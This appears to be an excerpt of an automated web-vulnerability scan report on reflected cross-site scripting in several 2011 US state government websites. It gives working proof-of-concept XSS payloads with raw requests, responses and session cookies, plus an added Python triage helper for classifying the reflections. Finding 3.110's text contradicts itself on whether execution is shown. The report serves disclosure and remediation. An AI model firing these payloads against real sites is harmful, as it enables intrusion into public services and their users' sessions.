Expires: Sun, 29 Apr 2012 11:24:55 GMT
Last-Modified: Sat, 30 Apr 2011 11:24:55 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 11:24:55 GMT
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJSdee3d<script>alert(1)</script>8660aed3ca9
//path:
//################################################################


3.108. http://www.nysegov.com/citGuide.cfm [content parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citGuide.cfm

Issue detail

The value of the content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d19"><script>alert(1)</script>6c86872287c was submitted in the content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /citGuide.cfm?superCat=119&cat=411&content=maind7d19"><script>alert(1)</script>6c86872287c HTTP/1.1
Host: www.nysegov.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=101047966.1304117404.1.1.utmcsr=ny.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=101047966.182442221.1304117404.1304117404.1304117404.1; __utmc=101047966; __utmb=101047966.1.10.1304117404

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:50:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>
                   
                   <link rel="STYLESHEET" type
...[SNIP]...
<a href="/citGuide.cfm?superCat=119&content=maind7d19"><script>alert(1)</script>6c86872287c"
                title="Housing"
                style="font-weight:bold">
...[SNIP]...

3.109. http://www.nysegov.com/citGuide.cfm [superCat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citGuide.cfm

Issue detail

The value of the superCat request parameter is copied into an HTML comment. The payload 801f8--><img%20src%3da%20onerror%3dalert(1)>c8077f981fe was submitted in the superCat parameter. This input was echoed as 801f8--><img src=a onerror=alert(1)>c8077f981fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /citGuide.cfm?superCat=119801f8--><img%20src%3da%20onerror%3dalert(1)>c8077f981fe HTTP/1.1
Host: www.nysegov.com
Proxy-Connection: keep-alive
Referer: http://ny.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:49:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Banner Error Handler Page</title>
</head>

<body>
<table background="http://www.nysegov.com/images/pi
...[SNIP]...
<!--

Element 119801f8--><img src=a onerror=alert(1)>c8077f981fe is undefined in a CFML structure referenced as part of an expression. <br>
...[SNIP]...

3.110. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx [Resource parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.Framework.Web.UI.Resources.aspx

Issue detail

The value of the Resource request parameter is copied into a JavaScript string literal (the argument of the alert(...) call below) in a response served as Content-Type: text/javascript, not into HTML text between tags as the scanner classified it. The payload 4bb77<script>alert(1)</script>116c5323795 was submitted in the Resource parameter and was echoed unmodified. When this resource is loaded through <script src>, the reflected <script> tags are inert string content; what would matter in this context is a double quote or backslash that terminates the literal, which this payload does not contain. Fetched directly, the body is not parsed as HTML. The reflection is confirmed, but arbitrary JavaScript execution is not demonstrated by this response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SCBOS.Core.Framework.Web.UI.Resources.aspx?Resource=xbrowser.js4bb77<script>alert(1)</script>116c5323795&Type=javascript HTTP/1.1
Host: www.scsignon.sc.gov
Connection: keep-alive
Referer: https://www.scsignon.sc.gov/?CallbackUrl=https://www3.sctax.org/eSales/procLogon.asp&ApplicationSId=ESales
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Accept-Ranges: bytes
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 01:07:29 GMT
Content-Length: 217

alert("Could not load resource 'xbrowser.js4bb77<script>alert(1)</script>116c5323795': The resource 'xbrowser.js4bb77<script>alert(1)</script>116c5323795' was not found by SCBOS.Core.Framework.Web.UI.
...[SNIP]...

3.111. http://www.sled.state.sc.us/sled/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sled.state.sc.us
Path:   /sled/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8873<a%20b%3dc>fab5232803f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8873<a b=c>fab5232803f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sled/default.asp?b8873<a%20b%3dc>fab5232803f=1 HTTP/1.1
Host: www.sled.state.sc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:13 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 779
Content-Type: text/html
Set-Cookie: CISESSIONID=9379671bc4a2e62295ab3ef459e1783dICE383; path=/
Set-Cookie: ASPSESSIONIDASDSSDTS=CGNHDODBAOHAGHJBGOMGFGJK; path=/
Cache-control: private

<HTML><HEAD><TITLE>SLED Web Site Error Message</TITLE><style type=text/css>FONT {FONT-SIZE: 12px; FONT-FAMILY: Verdana,Helvetica}</style></HEAD><BODY><hr><br><B><font>Error Description:</font><br></B>
...[SNIP]...
<P>Keyword/name used is: 'b8873<a b=c>fab5232803f'. <p>
...[SNIP]...

3.112. http://www.state.mn.us/portal/mn/jsp/content.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/content.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b29"-alert(1)-"e4d6f19fe22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The reflected value sits inside the double-quoted string that is passed to setTimeout, so the first double quote of the payload closes that string; -alert(1)- is then parsed as a subtraction between two string literals, and alert(1) runs as soon as the enclosing <SCRIPT> block executes, before setTimeout is ever called with the (now NaN) result.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/content.do?26b29"-alert(1)-"e4d6f19fe22=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:34 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0773244517.1304167233@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 140
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='content.do?26b29"-alert(1)-"e4d6f19fe22=1'",100);
</SCRIPT>
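
Before accepting a scanner's High / Certain rating, the first check a reviewer makes is where the marker actually lands and whether the response is parsed as HTML at all. Three findings in this section (3.106, 3.107, 3.110) reflect the payload into responses served as text/css, application/javascript and text/javascript: the echo is real, but a browser does not run a <script> tag it meets inside a stylesheet or a JavaScript file. Two others (3.104, 3.109) land inside a comment, where no encoder helps and the data simply must not be written; the rest land in text, an attribute, or a single- or double-quoted JavaScript string, each of which dictates both the break-out characters to test and the encoder that fixes it. The Python below is an added triage helper written for this report, not part of Burp or of any of the sites: the sample responses are constructed from the request/response excerpts above (status line and Content-Type as recorded, bodies cut down to the lines around the reflection), and the context detection is a deliberately small line-level heuristic rather than an HTML parser.

```python
from typing import Dict, Tuple

HTML_TYPES = ('text/html', 'application/xhtml+xml')

# Constructed from the response excerpts in this report: status line and Content-Type are
# the recorded ones; bodies are cut down to the lines around the reflection. Each entry is
# (marker, raw response), the marker being the random prefix the scanner put in front of
# the payload, so the text *before* it is the context the payload has to break out of.
SAMPLES: Dict[str, Tuple[str, str]] = {
    'delmar_3.97': ('3626e',
        'HTTP/1.0 404 Not Found\nContent-Type: text/html\n\n'
        '<html><body><div style="font-style: italic; font-size: 90%;">'
        'education/district3626e<script>alert(1)</script>d8af3be9d26/district.php</div></body></html>'),
    'nv_3.106': ('6bd35',
        'HTTP/1.1 200 OK\nContent-Type: text/css; charset=utf-8\n\n'
        '/* id: EktronBubbleCss6bd35<script>alert(1)</script>2680ccebefc */\n'),
    'scsignon_3.110': ('4bb77',
        'HTTP/1.1 200 OK\nContent-Type: text/javascript; charset=utf-8\n\n'
        'alert("Could not load resource \'xbrowser.js4bb77<script>alert(1)</script>116c5323795\'");'),
    'kodak_3.104': ('e81c7',
        'HTTP/1.1 200 OK\nContent-Type: text/html;charset=ISO-8859-1\n\n'
        "<html><head><script>\n/* console.log('getRequestURI(): /gallery/lp/2010/visit_florida/vacation_photos.jsp');\n"
        "console.log('getQueryString(): e81c7*/alert(1)//4c687dfaa6f=1'); */\n</script></head></html>"),
    'ms_3.105': ('6e740',
        'HTTP/1.1 200 OK\ncontent-type: text/html;charset=ISO-8859-1\n\n'
        '<html><body><img src="images/hdr_46e740"><img src=a onerror=alert(1)>a3b5706621b.gif" width="253">'),
    'nysegov_3.109': ('801f8',
        'HTTP/1.1 200 OK\nContent-Type: text/html; charset=UTF-8\n\n'
        '<html><body><!--\n\nElement 119801f8--><img src=a onerror=alert(1)>c8077f981fe is undefined'),
    'georgia_3.101': ('23c8f',
        'HTTP/1.1 200 OK\nContent-Type: text/html;charset=UTF-8\n\n'
        '<html><head><script type="text/javascript">\nlocation.replace('
        "'http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=1223c8f';alert(1)//5a4f221ee04');"
        '\n</script></head></html>'),
    'mn_3.112': ('26b29',
        'HTTP/1.0 200 OK\nContent-Type: text/html;charset=utf-8\n\n'
        '<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href=\'content.do?'
        '26b29"-alert(1)-"e4d6f19fe22=1\'",100);\n</SCRIPT>'),
}


def split_response(raw: str) -> Tuple[Dict[str, str], str]:
    """Split a raw HTTP response (CRLF or LF line endings) into a lower-cased header map and the body."""
    raw = raw.replace('\r\n', '\n')
    head, _, body = raw.partition('\n\n')
    headers: Dict[str, str] = {}
    for line in head.split('\n')[1:]:          # skip the status line
        name, _, value = line.partition(':')
        headers[name.strip().lower()] = value.strip()
    return headers, body


def _open_quote(fragment: str) -> str:
    """Return the quote character left open at the end of `fragment`, or '' if none (odd-count heuristic)."""
    for q in ('"', "'"):
        if fragment.count(q) % 2 == 1:
            return q
    return ''


def classify_reflection(raw: str, marker: str) -> str:
    """Name the syntactic context the marker lands in, or say why the response is not HTML at all."""
    headers, body = split_response(raw)
    pos = body.find(marker)
    if pos < 0:
        return 'not reflected'
    ctype = headers.get('content-type', '').split(';')[0].strip().lower()
    if ctype not in HTML_TYPES:
        # A missing Content-Type is its own problem: the browser will sniff the body.
        return 'reflected in non-HTML response (%s)' % (ctype or 'no Content-Type, browser sniffs')
    before = body[:pos]
    lower = before.lower()
    if before.rfind('<!--') > before.rfind('-->'):
        return 'html comment'
    if lower.rfind('<script') > lower.rfind('</script'):
        if before.rfind('/*') > before.rfind('*/'):
            return 'js block comment'
        q = _open_quote(before.rsplit('\n', 1)[-1])    # only the current line matters for the literal
        return 'js string (%s-quoted)' % q if q else 'js code'
    if before.rfind('<') > before.rfind('>'):
        q = _open_quote(before[before.rfind('<'):])
        return 'attribute (%s-quoted)' % q if q else 'inside tag, unquoted'
    return 'text between tags'


def triage(name: str) -> str:
    """Classify one of the embedded samples by name."""
    marker, raw = SAMPLES[name]
    return classify_reflection(raw, marker)


if __name__ == '__main__':
    for name in SAMPLES:
        print('%-16s %s' % (name, triage(name)))
```

Run as a script it prints one verdict per sample. The two non-HTML verdicts are the ones to downgrade or re-test with a context-appropriate payload (a double quote for the string literal in 3.110, a line break for the // comment in 3.107), the two comment verdicts are fix-by-removal cases, and the quoted-string and attribute verdicts tell you which encoder (JavaScript string escaping versus HTML attribute escaping) the fix needs. The quote heuristic counts quotes on the current line only, so a string literal that spans lines or contains escaped quotes will confuse it; for anything beyond a first pass, confirm in a browser.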



3.113. http://www.state.mn.us/portal/mn/jsp/contentprocess.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/contentprocess.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f2c"-alert(1)-"c7409e96eae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/contentprocess.do?82f2c"-alert(1)-"c7409e96eae=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:34 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0818237359.1304167233@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 135
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?82f2c"-alert(1)-"c7409e96eae=1'",100);
</SCRIPT>



3.114. http://www.state.mn.us/portal/mn/jsp/home.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/home.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c61e"-alert(1)-"fd8aeb3c20e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/home.do?9c61e"-alert(1)-"fd8aeb3c20e=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:34 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0910739485.1304167234@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 137
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='home.do?9c61e"-alert(1)-"fd8aeb3c20e=1'",100);
</SCRIPT>



3.115. http://www.state.mn.us/portal/mn/jsp/hybrid.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/hybrid.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df818"-alert(1)-"70286dbfd63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/hybrid.do?df818"-alert(1)-"70286dbfd63=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:35 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0293230763.1304167235@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 139
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='hybrid.do?df818"-alert(1)-"70286dbfd63=1'",100);
</SCRIPT>



3.116. http://www.state.mn.us/portal/mn/jsp/logon.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/logon.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 339bf"-alert(1)-"5b00271e634 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/logon.do?339bf"-alert(1)-"5b00271e634=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:36 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1277276779.1304167236@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 135
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?339bf"-alert(1)-"5b00271e634=1'",100);
</SCRIPT>



3.117. http://www.state.mn.us/portal/mn/jsp/redirectLink.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/redirectLink.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a73e"-alert(1)-"71daca0d366 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/redirectLink.do?8a73e"-alert(1)-"71daca0d366=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:36 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1588434861.1304167236@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 135
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?8a73e"-alert(1)-"71daca0d366=1'",100);
</SCRIPT>



3.118. http://www.state.mn.us/portal/mn/jsp/search.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.state.mn.us
Path:   /portal/mn/jsp/search.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f31e6"-alert(1)-"438c500b4c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/mn/jsp/search.do?f31e6"-alert(1)-"438c500b4c3=1 HTTP/1.1
Host: www.state.mn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@1950403355.1304161940@@@@; __utmz=205212754.1304161967.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=205212754.145768528.1304161967.1304161967.1304161967.1; __utmc=205212754; __utmb=205212754;

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:40:37 GMT
Server: Apache
Set-cookie: BV_IDS=ccccadfdgilflkhcfjkcenndfifdgon.0:@@@@0437518863.1304167236@@@@; path=/portal; expires=Friday, 22-Jan-1971 10:00:00 GMT
Content-Length: 135
Connection: close
Content-Type: text/html;charset=utf-8


<SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document.location.href='false?f31e6"-alert(1)-"438c500b4c3=1'",100);
</SCRIPT>



3.119. https://www.vermontjoblink.com/ada/leavesite.cfm [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/leavesite.cfm

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d7a"style%3d"x%3aexpression(alert(1))"0a17ee4770b was submitted in the url parameter. This input was echoed as a8d7a"style="x:expression(alert(1))"0a17ee4770b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2Fa8d7a"style%3d"x%3aexpression(alert(1))"0a17ee4770b HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:05 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="http://www.act.org/certificate/a8d7a"style="x:expression(alert(1))"0a17ee4770b" target="_blank">
...[SNIP]...

3.120. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_eligibility_dsp.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3251d"style%3d"x%3aexpression(alert(1))"958bb28727d was submitted in the rand parameter. This input was echoed as 3251d"style="x:expression(alert(1))"958bb28727d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /ada/mn_eligibility_dsp.cfm?rand=1688523251d"style%3d"x%3aexpression(alert(1))"958bb28727d HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:07 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
